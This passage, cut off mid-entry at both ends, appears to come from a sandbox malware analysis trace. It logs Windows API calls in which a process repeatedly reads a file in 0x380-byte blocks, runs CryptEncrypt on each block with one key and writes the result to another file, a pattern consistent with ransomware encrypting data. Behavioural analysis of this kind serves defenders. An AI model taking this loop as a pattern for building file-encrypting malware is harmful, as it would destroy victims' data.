lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.740] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.740] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.740] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.740] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.740] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.740] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.740] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.740] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.740] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.740] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.741] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.741] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.741] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.741] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.741] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.741] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.741] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.741] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.741] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.742] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.742] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.742] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.742] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.742] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.742] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.742] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.742] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.742] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.742] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.742] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.742] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.743] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.743] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.743] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.743] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.743] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.743] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.743] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.743] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.743] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.743] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.743] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.743] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.743] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.743] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.744] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.744] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.744] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.744] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.744] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.744] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.744] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.744] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.744] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.744] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.744] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.744] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.745] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.745] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.745] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.745] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.745] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.745] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.745] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.745] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.745] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.745] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.745] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.745] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.745] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.745] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.746] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.746] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.746] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.746] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.746] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.746] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.746] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.746] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.746] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.746] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.746] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.746] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.746] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.747] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.747] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.747] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.747] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.747] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.747] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.747] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.747] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.747] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.747] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.747] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.747] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.747] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, 